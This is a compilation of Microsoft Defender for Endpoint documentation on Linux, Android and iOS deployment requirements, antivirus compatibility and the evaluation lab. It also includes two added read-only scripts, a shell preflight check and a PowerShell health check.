Deploy Microsoft Defender for Endpoint on Linux using one of the following
deployment methods:
The command-line tool:
Manual deployment
Third-party management tools:
Deploy using Puppet configuration management tool
Deploy using Ansible configuration management tool
Deploy using Chef configuration management tool
Deploy using Saltstack configuration management tool

If you experience any installation failures, refer to Troubleshooting installation
failures in Microsoft Defender for Endpoint on Linux.

Note

Installing Microsoft Defender for Endpoint in any location other than the default
install path isn't supported.

Microsoft Defender for Endpoint on Linux creates an "mdatp" user with a random
UID and GID. If you want to control the UID and GID, create an "mdatp" user prior
to installation using the "/usr/sbin/nologin" shell option. For example:
mdatp:x:UID:GID::/home/mdatp:/usr/sbin/nologin.

System requirements
Supported Linux server distributions and versions on x64 (AMD64/EM64T, also known as
x86_64):

Red Hat Enterprise Linux 6.7 or higher (In preview)

Red Hat Enterprise Linux 7.2 or higher

Red Hat Enterprise Linux 8.x

Red Hat Enterprise Linux 9.x

CentOS 6.7 or higher (In preview)

CentOS 7.2 or higher

Ubuntu 16.04 LTS or higher LTS

Debian 9 - 12

SUSE Linux Enterprise Server 12 or higher

Oracle Linux 7.2 or higher

Oracle Linux 8.x

Oracle Linux 9.x

Amazon Linux 2

Amazon Linux 2023

Fedora 33 or higher

Rocky 8.7 and higher

Alma 8.4 and higher

Mariner 2

Note
Distributions and versions that aren't explicitly listed are unsupported (even if
they're derived from the officially supported distributions). Because RHEL 6
'extended end of life' support ends on June 30, 2024, MDE Linux support for RHEL 6
will also be deprecated by June 30, 2024. MDE Linux version 101.23082.0011 is the
last MDE Linux release supporting RHEL 6.7 or higher (it doesn't expire before
June 30, 2024). Customers are advised to plan upgrades to their RHEL 6
infrastructure aligned with guidance from Red Hat.

List of supported kernel versions

Note

Microsoft Defender for Endpoint on Red Hat Enterprise Linux and CentOS 6.7 to 6.10
is a kernel-based solution. You must verify that the kernel version is supported
before updating to a newer kernel version. Microsoft Defender for Endpoint for all
other supported distributions and versions is kernel-version-agnostic, with the
minimal requirement that the kernel version be at or greater than 3.10.0-327.

The fanotify kernel option must be enabled.

Supported kernels for Red Hat Enterprise Linux 6 and CentOS 6:
For 6.7: 2.6.32-573.* (except 2.6.32-573.el6.x86_64)
For 6.8: 2.6.32-642.*
For 6.9: 2.6.32-696.* (except 2.6.32-696.el6.x86_64)
For 6.10:
2.6.32-754.10.1.el6.x86_64
2.6.32-754.11.1.el6.x86_64
2.6.32-754.12.1.el6.x86_64
2.6.32-754.14.2.el6.x86_64
2.6.32-754.15.3.el6.x86_64
2.6.32-754.17.1.el6.x86_64
2.6.32-754.18.2.el6.x86_64
2.6.32-754.2.1.el6.x86_64
2.6.32-754.22.1.el6.x86_64
2.6.32-754.23.1.el6.x86_64
2.6.32-754.24.2.el6.x86_64
2.6.32-754.24.3.el6.x86_64
2.6.32-754.25.1.el6.x86_64
2.6.32-754.27.1.el6.x86_64
2.6.32-754.28.1.el6.x86_64
2.6.32-754.29.1.el6.x86_64
2.6.32-754.29.2.el6.x86_64
2.6.32-754.3.5.el6.x86_64
2.6.32-754.30.2.el6.x86_64
2.6.32-754.33.1.el6.x86_64
2.6.32-754.35.1.el6.x86_64
2.6.32-754.39.1.el6.x86_64
2.6.32-754.41.2.el6.x86_64
2.6.32-754.43.1.el6.x86_64
2.6.32-754.47.1.el6.x86_64
2.6.32-754.48.1.el6.x86_64
2.6.32-754.49.1.el6.x86_64
2.6.32-754.6.3.el6.x86_64
2.6.32-754.9.1.el6.x86_64

Note

After a new package version is released, support for the previous two versions
is reduced to technical support only. Versions older than that which are listed
in this section are provided for technical upgrade support only.

Caution

Running Defender for Endpoint on Linux side by side with other fanotify-based
security solutions isn't supported. It can lead to unpredictable results,
including hanging the operating system. If there are any other applications on
the system that use fanotify in blocking mode, they're listed in the
conflicting_applications field of the mdatp health command output. The Linux
FAPolicyD feature uses fanotify in blocking mode and is therefore unsupported when
running Defender for Endpoint in active mode. You can still safely take advantage
of Defender for Endpoint on Linux EDR functionality after configuring the antivirus
functionality (Real Time Protection Enabled) to Passive mode.

Disk space: 2 GB

Note
An additional 2 GB of disk space might be needed if cloud diagnostics are
enabled for crash collections.

/opt/microsoft/mdatp/sbin/wdavdaemon requires executable permission. For more
information, see "Ensure that the daemon has executable permission" in
Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux.

Cores: 2 minimum, 4 preferred

Memory: 1 GB minimum, 4 GB preferred

Note

Make sure that you have free disk space in /var.
List of supported filesystems for RTP, Quick, Full, and Custom Scan:

RTP, Quick, Full Scan:
btrfs
ecryptfs
ext2
ext3
ext4
fuse
fuseblk
jfs
nfs (v3 only)
overlay
ramfs
reiserfs
tmpfs
udf
vfat
xfs

Custom Scan:
All filesystems supported for RTP, Quick, Full Scan
Efs
S3fs
Blobfuse
Lustre
glusterfs
Afs
sshfs
cifs
smb
gcsfuse
sysfs

After you've enabled the service, you might need to configure your network or firewall to
allow outbound connections between it and your endpoints.

Audit framework (auditd) must be enabled.

Note

System events captured by rules added to /etc/audit/rules.d/ will add to
audit.log(s) and might affect host auditing and upstream collection. Events
added by Microsoft Defender for Endpoint on Linux will be tagged with the mdatp
key.
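A preflight script for the requirements above (systemd, kernel version, fanotify, auditd, free space in /var, fanotify conflicts reported by mdatp health) that also validates a pre-created mdatp account in the form given in the installation note. This is an added example rather than Microsoft's code; the --field option of mdatp health and the sample UID/GID values are assumptions.

```shell
#!/bin/sh
# Preflight checks for Defender for Endpoint on Linux, derived from the requirements
# above: systemd, kernel >= 3.10.0-327, fanotify, auditd, 2 GB free in /var, no other
# fanotify users reported by "mdatp health", and an optional pre-created mdatp account.
# Added example, not Microsoft's code.

MIN_KERNEL="3.10.0-327"   # documented minimum for the kernel-version-agnostic builds

# kernel_version_ok "<uname -r string>": true when the version is >= 3.10.0-327.
# RHEL/CentOS 6.x (2.6.32-*) is a kernel-based build with its own allow-list and is
# reported as not ok here on purpose; check those kernels against the list above.
kernel_version_ok() {
    parts=$(printf '%s\n' "$1" |
        sed -E 's/^([0-9]+)\.([0-9]+)\.([0-9]+)(-([0-9]+))?.*$/\1 \2 \3 \5/')
    set -- $parts                     # e.g. "3.10.0-327.el7.x86_64" -> 3 10 0 327
    [ -n "$3" ] || return 1           # not a parseable kernel string
    major=$1; minor=$2; patch=$3; build=${4:-0}
    [ "$major" -eq 3 ]  || { [ "$major" -gt 3 ];  return; }
    [ "$minor" -eq 10 ] || { [ "$minor" -gt 10 ]; return; }
    [ "$patch" -eq 0 ]  || { [ "$patch" -gt 0 ];  return; }
    [ "$build" -ge 327 ]
}

# mdatp_passwd_entry_ok "<passwd line>" <uid> <gid>: validates a pre-created mdatp
# account in the form the note shows (mdatp:x:UID:GID::/home/mdatp:/usr/sbin/nologin).
mdatp_passwd_entry_ok() {
    want_uid=$2; want_gid=$3
    IFS=: read -r name _ uid gid _ home shell <<EOF
$1
EOF
    [ "$name" = mdatp ] && [ "$uid" = "$want_uid" ] && [ "$gid" = "$want_gid" ] &&
        [ "$home" = /home/mdatp ] && [ "$shell" = /usr/sbin/nologin ]
}

fanotify_enabled() {
    cfg=/boot/config-$(uname -r)
    if [ -r "$cfg" ]; then
        grep -q '^CONFIG_FANOTIFY=y' "$cfg"
    elif [ -r /proc/config.gz ]; then
        zcat /proc/config.gz | grep -q '^CONFIG_FANOTIFY=y'
    else
        return 1                      # cannot verify: treat as a failed check
    fi
}

var_free_ok() {
    avail_kb=$(df -Pk /var | awk 'NR == 2 { print $4 }')
    [ "${avail_kb:-0}" -ge 2097152 ]  # 2 GB expressed in 1K blocks
}

no_conflicting_apps() {
    # Meaningful once the agent is installed: mdatp health lists other fanotify users
    # in its conflicting_applications field (the --field option is assumed here).
    command -v mdatp >/dev/null 2>&1 || return 0
    apps=$(mdatp health --field conflicting_applications 2>/dev/null)
    [ -z "$apps" ] || [ "$apps" = "[]" ]
}

# preflight: runs the live checks, prints PASS/FAIL per item, returns the failure count.
preflight() {
    fails=0
    check() {                         # check "<label>" <command> [args...]
        label=$1; shift
        if "$@"; then echo "PASS  $label"; else echo "FAIL  $label"; fails=$((fails + 1)); fi
    }
    check "systemd is the system manager"          test -d /run/systemd/system
    check "kernel $(uname -r) is >= $MIN_KERNEL"    kernel_version_ok "$(uname -r)"
    check "fanotify is compiled into the kernel"   fanotify_enabled
    check "auditd service is active"               systemctl is-active --quiet auditd
    check "at least 2 GB free in /var"             var_free_ok
    check "no fanotify conflicts in mdatp health"  no_conflicting_apps
    return "$fails"
}

if [ "${1-}" = "--run" ]; then
    preflight
fi
```

Run it as sh preflight.sh --run on the target host before onboarding; a non-zero exit status is the number of failed checks.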

External package dependency

The following external package dependencies exist for the mdatp package:

The mdatp RPM package requires "glibc >= 2.17", "audit", "policycoreutils",
"semanage", "selinux-policy-targeted", "mde-netfilter"
For RHEL6 the mdatp RPM package requires "audit", "policycoreutils", "libselinux",
"mde-netfilter"
For DEBIAN the mdatp package requires "libc6 >= 2.23", "uuid-runtime", "auditd",
"mde-netfilter"

The mde-netfilter package also has the following package dependencies:

For DEBIAN the mde-netfilter package requires "libnetfilter-queue1", "libglib2.0-0"
For RPM the mde-netfilter package requires "libmnl", "libnfnetlink",
"libnetfilter_queue", "glib2"

If the Microsoft Defender for Endpoint installation fails due to missing dependencies
errors, you can manually download the pre-requisite dependencies.

Configuring Exclusions
When adding exclusions to Microsoft Defender Antivirus, you should be mindful of
Common Exclusion Mistakes for Microsoft Defender Antivirus.

Network connections
The following downloadable spreadsheet lists the services and their associated URLs
that your network must be able to connect to. You should ensure that there are no
firewall or network filtering rules that would deny access to these URLs. If there are, you
might need to create an allow rule specifically for them.

Microsoft Defender for Endpoint URL list for commercial customers: Spreadsheet of
specific DNS records for service locations, geographic locations, and OS for
commercial customers. Download the spreadsheet here.

Microsoft Defender for Endpoint URL list for Gov/GCC/DoD customers: Spreadsheet of
specific DNS records for service locations, geographic locations, and OS for
Gov/GCC/DoD customers. Download the spreadsheet here.

Note

For a more specific URL list, see Configure proxy and internet connectivity
settings.

Defender for Endpoint can discover a proxy server by using the following discovery
methods:

Transparent proxy
Manual static proxy configuration

If a proxy or firewall is blocking anonymous traffic, make sure that anonymous traffic is
permitted in the previously listed URLs. For transparent proxies, no additional
configuration is needed for Defender for Endpoint. For static proxy, follow the steps in
Manual Static Proxy Configuration.

Warning

PAC, WPAD, and authenticated proxies are not supported. Ensure that only a static
proxy or transparent proxy is being used.
SSL inspection and intercepting proxies are also not supported for security reasons.
Configure an exception for SSL inspection and your proxy server to directly pass
through data from Defender for Endpoint on Linux to the relevant URLs without
interception. Adding your interception certificate to the global store will not allow
for interception.

For troubleshooting steps, see Troubleshoot cloud connectivity issues for Microsoft
Defender for Endpoint on Linux.

How to update Microsoft Defender for Endpoint on Linux
Microsoft regularly publishes software updates to improve performance, security, and to
deliver new features. To update Microsoft Defender for Endpoint on Linux, refer to
Deploy updates for Microsoft Defender for Endpoint on Linux.

How to configure Microsoft Defender for Endpoint on Linux
Guidance for how to configure the product in enterprise environments is available in Set
preferences for Microsoft Defender for Endpoint on Linux.

Common applications that Microsoft Defender for Endpoint can impact
High I/O workloads from certain applications can experience performance issues when
Microsoft Defender for Endpoint is installed. These include applications for developer
scenarios like Jenkins and Jira, and database workloads like OracleDB and Postgres. If
experiencing performance degradation, consider setting exclusions for trusted
applications, keeping Common Exclusion Mistakes for Microsoft Defender Antivirus in
mind. For additional guidance, consider consulting documentation regarding antivirus
exclusions from third party applications.

Resources
For more information about logging, uninstalling, or other topics, see Resources.

Related articles
Protect your endpoints with Defender for Cloud's integrated EDR solution:
Microsoft Defender for Endpoint
Connect your non-Azure machines to Microsoft Defender for Cloud
Turn on network protection for Linux

Microsoft Defender for Endpoint on Android
Article • 08/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This topic describes how to install, configure, update, and use Defender for Endpoint on
Android.

Caution

Running other third-party endpoint protection products alongside Defender for
Endpoint on Android is likely to cause performance problems and unpredictable
system errors.

How to install Microsoft Defender for Endpoint on Android

Prerequisites
For end users:
The end user must be assigned a Microsoft Intune license. For more information
on how to assign licenses, see Assign licenses to users.
The users of the app must be assigned a Microsoft Defender for Endpoint
license. For more information on how to assign licenses, see Microsoft Defender
for Endpoint licensing requirements.
Intune Company Portal app can be downloaded from Google Play and is
available on the Android device.
Additionally, device(s) can be enrolled via the Intune Company Portal app to
enforce Intune device compliance policies.

For Administrators:
Access to the Microsoft Defender portal.

Access to the Microsoft Intune admin center to:
Deploy the app to enrolled user groups in your organization.
Configure Microsoft Defender for Endpoint risk signals in app protection
policy.

Note
Microsoft Defender for Endpoint now extends protection to an
organization's data within a managed application (MAM) for devices
that are not enrolled using mobile device management (MDM), but are
using Intune to manage mobile applications. It also extends this support
to customers who use other enterprise mobility management solutions,
while still using Intune for mobile application management (MAM).
In addition, Microsoft Defender for Endpoint already supports devices
that are enrolled using Intune mobile device management (MDM).

Network Requirements
For Microsoft Defender for Endpoint on Android to function when connected to a
network the firewall/proxy will need to be configured to enable access to Microsoft
Defender for Endpoint service URLs.

System Requirements
Mobile phones and tablets running Android 8.0 and above. Mobile phones
running Android Go and other mobile devices running Android aren't currently
supported.
Intune Company Portal app is downloaded from Google Play and installed.
Device enrollment is required for Intune device compliance policies to be enforced.

Note

Microsoft Defender for Endpoint on Android isn't supported on userless or shared
devices.

Installation instructions
Microsoft Defender for Endpoint on Android supports installation on both modes of
enrolled devices - the legacy Device Administrator and Android Enterprise modes.
Currently, Personally-owned devices with work profile, Corporate-owned devices with
work profile, and Corporate-owned fully managed user device enrollments are
supported in Android Enterprise. Support for other Android Enterprise modes will be
announced when ready.

Deployment of Microsoft Defender for Endpoint on Android is via Microsoft Intune
(MDM). For more information, see Deploy Microsoft Defender for Endpoint on
Android with Microsoft Intune.
For installation of Microsoft Defender for Endpoint on devices that aren't enrolled
using Intune mobile device management (MDM), see Configure Microsoft Defender for
Endpoint risk signals in app protection policy (MAM).

Note

Microsoft Defender for Endpoint on Android is available on Google Play now.

You can connect to Google Play from Intune to deploy Microsoft Defender for
Endpoint app, across Device Administrator and Android Enterprise enrollment
modes.

How to configure Microsoft Defender for Endpoint on Android
Guidance on how to configure Microsoft Defender for Endpoint on Android features is
available in Configure Microsoft Defender for Endpoint on Android features.

Related topics
Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune
Configure Microsoft Defender for Endpoint on Android features
Mobile Application Management (MAM) basics

Microsoft Defender for Endpoint on iOS
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint on iOS offers protection against phishing and unsafe
network connections from websites, emails, and apps. All alerts will be available through
a single pane of glass in the Microsoft Defender portal. The portal gives security teams a
centralized view of threats on iOS devices along with other platforms.

Caution

Running other third-party endpoint protection products alongside Defender for
Endpoint on iOS is likely to cause performance problems and unpredictable system
errors.

Prerequisites

For End Users

Microsoft Defender for Endpoint license assigned to the end user(s) of the app.
See Microsoft Defender for Endpoint licensing requirements.

For enrolled devices:

Device(s) are enrolled via the Intune Company Portal app to enforce Intune
device compliance policies. This requires the end user to be assigned a
Microsoft Intune license.
Intune Company Portal app can be downloaded from the Apple App Store.

Note

Apple does not allow redirecting users to download other apps from the app
store so this step needs to be done by the user before onboarding to
Microsoft Defender for Endpoint app.

Device(s) are registered with Microsoft Entra ID. This requires the end user to be
signed in through the Microsoft Authenticator app.

For unenrolled devices: Device(s) are registered with Microsoft Entra ID. This
requires the end user to be signed in through the Microsoft Authenticator app.

For more information on how to assign licenses, see Assign licenses to users.

For Administrators

Access to the Microsoft Defender portal.

Access to the Microsoft Intune admin center, to:

Deploy the app to enrolled user groups in your organization.
Configure Microsoft Defender for Endpoint risk signals in app protection policy
(MAM).

Note

Microsoft Defender for Endpoint now extends protection to an organization's data
within a managed application for those who aren't using mobile device management
(MDM) but are using Intune to manage mobile applications. It also extends this
support to customers who use other enterprise mobility management solutions,
while still using Intune for mobile application management (MAM). In addition,
Microsoft Defender for Endpoint already supports devices that are enrolled using
Intune mobile device management (MDM).

System Requirements
iOS device running iOS 15.0 and above. iPads are also supported.

The device is either enrolled with the Intune Company Portal app or is registered
with Microsoft Entra ID through Microsoft Authenticator with the same account.

Note

Microsoft Defender for Endpoint on iOS isn't supported on user-less or shared
devices, and isn't currently supported while using iOS User Enrollment.

Installation instructions
Deployment of Microsoft Defender for Endpoint on iOS can be done via Microsoft
Intune; both supervised and unsupervised devices are supported. End users can also
install the app directly from the Apple App Store.

For information on deploying on enrolled devices through Microsoft Configuration
Manager or Intune, see Deploy Microsoft Defender for Endpoint on iOS.

For information on using Defender for Endpoint in app protection policy (MAM),
see Configure app protection policy to include Defender for Endpoint risk signals
(MAM).

Resources
Stay informed about upcoming releases by visiting What's new in Microsoft
Defender for Endpoint on iOS or our blog.

Provide feedback through the in-app feedback system or through the unified security
console.

Next steps
Deploy Microsoft Defender for Endpoint on iOS through Intune for enrolled
devices
Configure app protection policy to include Defender for Endpoint risk signals
(MAM)
Configure Microsoft Defender for Endpoint on iOS features
Configure Conditional Access policy based on device risk score from Microsoft
Defender for Endpoint
Mobile Application Management (MAM) basics


Antivirus solution compatibility with
Microsoft Defender for Endpoint
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

The Microsoft Defender for Endpoint agent depends on Microsoft Defender Antivirus for
some capabilities such as file scanning.

Important

Endpoint detection and response (EDR) in Defender for Endpoint does not adhere
to the Microsoft Defender Antivirus Exclusions settings.

For optimal protection, configure the following settings for devices that are onboarded
to Defender for Endpoint, whether Microsoft Defender Antivirus is the active
antimalware solution or not:

Security intelligence updates (which also update the scan engine)
Platform updates

For more information, see Manage Microsoft Defender Antivirus updates and apply
baselines.

If an onboarded device is protected by a non-Microsoft antimalware client, Microsoft
Defender Antivirus goes into passive mode. In this scenario, Microsoft Defender
Antivirus continues to receive updates, and the msmpeng.exe process is listed as a
running service. But it doesn't perform real-time protection scans, scheduled scans, or
on-demand scans, and it doesn't replace the running non-Microsoft antimalware
client. The Microsoft Defender Antivirus user interface is disabled. Device users can't use
Microsoft Defender Antivirus to perform on-demand scans or configure most options,
such as attack surface reduction (ASR) rules, network protection, indicators (file, IP
address, URL, and certificate allow/block), web content filtering, controlled folder access,
and so forth.
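As an added example (not from the Microsoft article), the following PowerShell reads the state a practitioner checks after onboarding a device that runs a non-Microsoft antivirus: whether Microsoft Defender Antivirus is in passive mode, whether it is still receiving platform, engine and security intelligence updates, and whether the Defender for Endpoint sensor service is running. The 7-day signature-age threshold is an assumption chosen for this example; the service names and the ForceDefenderPassiveMode policy value are those the product uses.

```powershell
# Added example (not from the Microsoft article): audit Microsoft Defender Antivirus
# mode, update freshness and sensor state on a device onboarded to Defender for
# Endpoint. Run in an elevated PowerShell session on the device itself.

$maxSignatureAgeDays = 7   # assumption for this example, not a Microsoft threshold

$status = Get-MpComputerStatus

# AMRunningMode is 'Normal' when Defender Antivirus is the active engine,
# 'Passive Mode' when a non-Microsoft antivirus is active, and 'EDR Block Mode'
# when EDR in block mode is remediating on top of a passive Defender Antivirus.
$mode = $status.AMRunningMode

# Updates must keep flowing even in passive mode: the platform and engine are
# shared with the EDR sensor, so stale versions weaken detection either way.
$signatureStale = $status.AntivirusSignatureAge -gt $maxSignatureAgeDays

# Service state. WinDefend stays 'Running' in passive mode, so by itself it does
# not prove that real-time protection is on; Sense is the Defender for Endpoint
# sensor and must be running for the device to report to the portal.
$defend = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
$sense  = Get-Service -Name Sense -ErrorAction SilentlyContinue
$defendState = if ($defend) { [string]$defend.Status } else { 'missing' }
$senseState  = if ($sense)  { [string]$sense.Status }  else { 'not installed' }

# On Windows Server 2012 R2 and 2016 with the unified agent, passive mode is set
# explicitly through this policy value rather than detected automatically.
$policyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
$forcedPassive = (Get-ItemProperty -Path $policyPath -Name ForceDefenderPassiveMode -ErrorAction SilentlyContinue).ForceDefenderPassiveMode

[pscustomobject]@{
    RunningMode              = $mode
    RealTimeProtectionOn     = $status.RealTimeProtectionEnabled
    PlatformVersion          = $status.AMProductVersion
    EngineVersion            = $status.AMEngineVersion
    SignatureVersion         = $status.AntivirusSignatureVersion
    SignatureAgeDays         = $status.AntivirusSignatureAge
    SignatureStale           = $signatureStale
    ForceDefenderPassiveMode = $forcedPassive
    WinDefendService         = $defendState
    SenseService             = $senseState
} | Format-List

# Call out the combinations that leave a gap.
if ($mode -like '*Passive*') {
    Write-Warning 'Defender Antivirus is passive: real-time, scheduled and on-demand scans come from the non-Microsoft client, so verify that client is healthy and updated.'
}
if ($mode -eq 'Normal' -and -not $status.RealTimeProtectionEnabled) {
    Write-Warning 'Defender Antivirus is the active engine but real-time protection is off.'
}
if ($signatureStale) {
    Write-Warning "Security intelligence is $($status.AntivirusSignatureAge) day(s) old; check update delivery."
}
if ($senseState -ne 'Running') {
    Write-Warning "Defender for Endpoint sensor service (Sense) is '$senseState'; the device is not reporting."
}
```

The script only reads state; it changes nothing on the device, so it is safe to run as a routine health check across a fleet.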
For more information, see the Microsoft Defender Antivirus and Defender for Endpoint
compatibility topic.


Microsoft Defender for Endpoint
evaluation lab
Article • 02/27/2024

Important

The Microsoft Defender for Endpoint evaluation lab was deprecated in January
2024.

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Conducting a comprehensive security product evaluation can be a complex process
requiring cumbersome environment and device configuration before an end-to-end
attack simulation can actually be done. Adding to the complexity is the challenge of
tracking where the simulation activities, alerts, and results are reflected during the
evaluation.

The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the
complexities of device and environment configuration so that you can focus on
evaluating the capabilities of the platform, running simulations, and seeing the
prevention, detection, and remediation features in action.

With the simplified set-up experience, you can focus on running your own test scenarios
and the pre-made simulations to see how Defender for Endpoint performs.

You'll have full access to the powerful capabilities of the platform such as automated
investigations, advanced hunting, and threat analytics, allowing you to test the
comprehensive protection stack that Defender for Endpoint offers.

You can add Windows 10, Windows 11, Windows Server 2019, Windows Server 2016,
and Linux (Ubuntu) devices that come pre-configured to have the latest OS versions and
the right security components in place as well as Office 2019 Standard installed.
You can also install threat simulators. Defender for Endpoint has partnered with industry
leading threat simulation platforms to help you test out the Defender for Endpoint
capabilities without having to leave the portal.

Install your preferred simulator, run scenarios within the evaluation lab, and instantly see
how the platform performs - all conveniently available at no extra cost to you. You'll also
have convenient access to a wide array of simulations which you can access and run from
the simulations catalog.

Before you begin

You'll need to fulfill the licensing requirements or have trial access to Microsoft
Defender for Endpoint to access the evaluation lab.

You must have Manage security settings permissions to:

Create the lab
Create devices
Reset password
Create simulations

If you enabled role-based access control (RBAC) and created at least one machine
group, users must have access to All machine groups.

For more information, see Create and manage roles.

Get started with the lab

You can access the lab from the menu. In the navigation menu, select Evaluation and
tutorials > Evaluation lab.

Note

Depending on the type of environment structure you select, devices will be
available for the specified number of hours from the day of activation.
Each environment is provisioned with a limited set of test devices. When
you've used up the provisioned devices and have deleted them, you can
request more devices.
You can request lab resources once a month.
Already have a lab? Make sure to enable the new threat simulators and have active
devices.

Set up the evaluation lab

1. In the navigation pane, select Evaluation & tutorials > Evaluation lab, then select
Setup lab.

2. Depending on your evaluation needs, you can choose to set up an environment
with fewer devices for a longer period or more devices for a shorter period. Select
your preferred lab configuration, then select Next.

3. (Optional) You can choose to install threat simulators in the lab.

Important

You'll first need to accept and provide consent to the terms and information
sharing statements.

4. Select the threat simulation agent you'd like to use and enter your details. You can
also choose to install threat simulators at a later time. If you choose to install
threat simulation agents during the lab setup, they are installed automatically on
every device you add.

5. Review the summary and select Setup lab.

After the lab setup process is complete, you can add devices and run simulations.

Add devices
When you add a device to your environment, Defender for Endpoint sets up a well-
configured device with connection details. You can add Windows 10, Windows 11,
Windows Server 2019, Windows Server 2016, and Linux (Ubuntu).

The device will be configured with the most up-to-date version of the OS and Office
2019 Standard as well as other apps such as Java, Python, and Sysinternals.

If you chose to add a threat simulator during the lab setup, the threat simulator
agent is installed on every device that you add.

The device will automatically be onboarded to your tenant with the recommended
Windows security components turned on and in audit mode - with no effort on your
side.

The following security components are pre-configured in the test devices:

Attack surface reduction
Block at first sight
Controlled folder access
Exploit protection
Network protection
Potentially unwanted application detection
Cloud-delivered protection
Microsoft Defender SmartScreen

Note

Microsoft Defender Antivirus will be on (not in audit mode). If Microsoft Defender
Antivirus blocks you from running your simulation, you can turn off real-time
protection on the device through Windows Security. For more information, see
Configure always-on protection.

Automated investigation settings will be dependent on tenant settings. It will be
configured to be semi-automated by default. For more information, see Overview of
Automated investigations.

Note

The connection to the test devices is done using RDP. Make sure that your firewall
settings allow RDP connections.

1. From the dashboard, select Add device.

2. Choose the type of device to add. You can choose to add Windows 10, Windows
11, Windows Server 2019, Windows Server 2016, and Linux (Ubuntu).

Note

If something goes wrong with the device creation process, you'll be notified
and you'll need to submit a new request. If the device creation fails, it will not
be counted against the overall allowed quota.

3. The connection details are displayed. Select Copy to save the password for the
device.

Note

The password is only displayed once. Be sure to save it for later use.

4. Device setup begins. This can take up to approximately 30 minutes.

5. See the status of test devices, the risk and exposure levels, and the status of
simulator installations by selecting the Devices tab.

Tip

In the Simulator status column, you can hover over the information icon to
see the installation status of an agent.

Add a domain controller

Add a domain controller to run complex scenarios such as lateral movement and
multistage attacks across multiple devices.

Note

Domain support is only available in the Microsoft Defender portal
(security.microsoft.com).

1. From the dashboard, select Add device.

2. Select Windows Server 2019, then select Set as domain controller.

3. When your domain controller has been provisioned, you'll be able to create
domain-joined devices by clicking Add device. Then select Windows 10 / Windows
11, and select Join to domain.

Note

Only one domain controller can be live at a time. The domain controller device will
remain live as long as there is a live device connected to it.

Request more devices

When all existing devices are used and deleted, you can request more devices. You
can request lab resources once a month.

1. From the evaluation lab dashboard, select Request for more devices.

2. Choose your configuration.

3. Submit the request.

When the request is submitted successfully you'll see a green confirmation banner and
the date of the last submission.

You can find the status of your request in the User Actions tab. Requests are approved
in a matter of hours.

When approved, the requested devices will be added to your lab set up and you'll be
able to create more devices.

Tip

To get more out of your lab, don't forget to check out our simulations library.

Simulate attack scenarios

Use the test devices to run your own attack simulations by connecting to them.

You can simulate attack scenarios using:

The "Do It Yourself" attack scenarios
Threat simulators

You can also use Advanced hunting to query data and Threat analytics to view reports
about emerging threats.

Do-it-yourself attack scenarios

If you are looking for a pre-made simulation, you can use our "Do It Yourself" attack
scenarios. These scripts are safe, documented, and easy to use. These scenarios
reflect Defender for Endpoint capabilities and walk you through the investigation
experience.

Note

The connection to the test devices is done using RDP. Make sure that your firewall
settings allow RDP connections.

1. Connect to your device and run an attack simulation by selecting Connect.

For Linux devices: you'll need to use a local SSH client and the provided command.

Note

If you don't have a copy of the password saved during the initial setup, you
can reset the password by selecting Reset password from the menu.
The device will change its state to "Executing password reset", then you'll be
presented with your new password in a few minutes.

2. Enter the password that was displayed during the device creation step.

3. Run Do-it-yourself attack simulations on the device.

Threat simulator scenarios

If you chose to install any of the supported threat simulators during the lab setup, you
can run the built-in simulations on the evaluation lab devices.

Running threat simulations using third-party platforms is a good way to evaluate
Microsoft Defender for Endpoint capabilities within the confines of a lab environment.

Note

Before you can run simulations, ensure the following requirements are met:

Devices must be added to the evaluation lab
Threat simulators must be installed in the evaluation lab

1. From the portal select Create simulation.

2. Select a threat simulator.

3. Choose a simulation or look through the simulation gallery to browse through the
available simulations.

You can get to the simulation gallery from:

The main evaluation dashboard in the Simulations overview tile, or
By navigating from the navigation pane Evaluation and tutorials >
Simulation & tutorials, then selecting Simulations catalog.

4. Select the devices where you'd like to run the simulation.

5. Select Create simulation.

6. View the progress of a simulation by selecting the Simulations tab. View the
simulation state, active alerts, and other details.

After running your simulations, we encourage you to walk through the lab progress bar
and explore how Microsoft Defender for Endpoint triggered an automated investigation
and remediation. Check out the evidence collected and analyzed by the feature.

Hunt for attack evidence through advanced hunting by using the rich query language
and raw telemetry, and check out some world-wide threats documented in Threat
analytics.

Simulation gallery

Microsoft Defender for Endpoint has partnered with various threat simulation platforms
to give you convenient access to test the capabilities of the platform right from
within the portal.

View all the available simulations by going to Simulations and tutorials > Simulations
catalog from the menu.

A list of supported third-party threat simulation agents is provided, and specific types of
simulations along with detailed descriptions are provided in the catalog.

You can conveniently run any available simulation right from the catalog.

Each simulation comes with an in-depth description of the attack scenario and
references such as the MITRE ATT&CK techniques used and sample Advanced hunting
queries you can run.

Evaluation report
The lab reports summarize the results of the simulations conducted on the devices.

At a glance, you'll quickly be able to see:

Incidents that were triggered
Generated alerts
Assessments on exposure level
Threat categories observed
Detection sources
Automated investigations

Provide feedback
Your feedback helps us get better in protecting your environment from advanced
attacks. Share your experience and impressions from product capabilities and evaluation
results.

Let us know what you think, by selecting Provide feedback.


Microsoft Defender for Endpoint -
demonstration scenarios
Article • 01/23/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus
Microsoft Defender for Individuals

The following demonstration scenarios will help you learn about the capabilities of
Microsoft Defender for Endpoint on Windows, Mac, and Linux. Demonstration scenarios
are provided for the following Microsoft Defender for Endpoint protection areas:

Attack surface reduction (ASR)
Next Generation Protection (NGP)
Endpoint detection and response (EDR)

Note

None of the sample files or suspicious links provided in this collection are actually
malicious; all links and demonstration files are harmless.
